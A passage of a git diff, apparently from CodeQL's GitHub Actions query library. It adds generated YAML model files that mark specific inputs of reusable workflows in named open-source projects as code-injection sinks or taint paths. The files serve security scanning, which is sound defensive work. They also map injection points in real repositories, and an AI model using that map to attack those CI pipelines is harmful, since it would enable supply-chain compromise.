["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..6c0165b65a91 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml new file mode 100644 index 000000000000..f33f433df1f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..fb700fa7a892 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "input.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml new file mode 100644 index 000000000000..60ab0a23c746 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml new file mode 100644 index 000000000000..e0a72159a7b0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml new file mode 100644 index 000000000000..7483ab3366ce --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml new file mode 100644 index 000000000000..137558d68d01 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml new file mode 100644 index 000000000000..cb48bce89cfa --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "input.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml new file mode 100644 index 000000000000..9f8338302a3e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml new file mode 100644 index 000000000000..49f73a1d620f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml new file mode 100644 index 000000000000..e1e8de225309 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml new file mode 100644 index 000000000000..c2f634f7d000 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "input.component", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml new file mode 100644 index 000000000000..89dcb32c453b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml new file mode 100644 index 000000000000..2ea319538441 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml new file mode 100644 index 000000000000..b9e9d879a66a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml new file mode 100644 index 000000000000..8a22c8415e63 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml new file mode 100644 index 000000000000..a5db7a9533e4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml new file mode 100644 index 000000000000..31113d603ffc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml new file mode 100644 index 000000000000..d8e08a8e2bd8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml new file mode 100644 index 000000000000..b7478e325a2b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..fff04025bc52 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml new file mode 100644 index 000000000000..be5ac94db5c9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml new file mode 100644 index 000000000000..b8633806ac7e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml new file mode 100644 index 000000000000..8e534e5be923 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml new file mode 100644 index 000000000000..44aa0ea3a928 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml new file mode 100644 index 000000000000..cd17a2ca4a59 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml new file mode 100644 index 000000000000..d96c0c99d0c1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml new file mode 100644 index 000000000000..f07f5ba54ea7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml new file mode 100644 index 000000000000..391108291479 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml new file mode 100644 index 000000000000..196c25e14e95 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml new file mode 100644 index 000000000000..7a2e2fea0eb9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..d00a80de5d1e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml new file mode 100644 index 000000000000..4f7926a22a68 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml new file mode 100644 index 000000000000..a0c0b5638dd0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml new file mode 100644 index 000000000000..494c63d62720 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_name", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.project", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml new file mode 100644 index 000000000000..bd855d53f139 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml new file mode 100644 index 000000000000..f499896a72ff --- /dev/null +++ 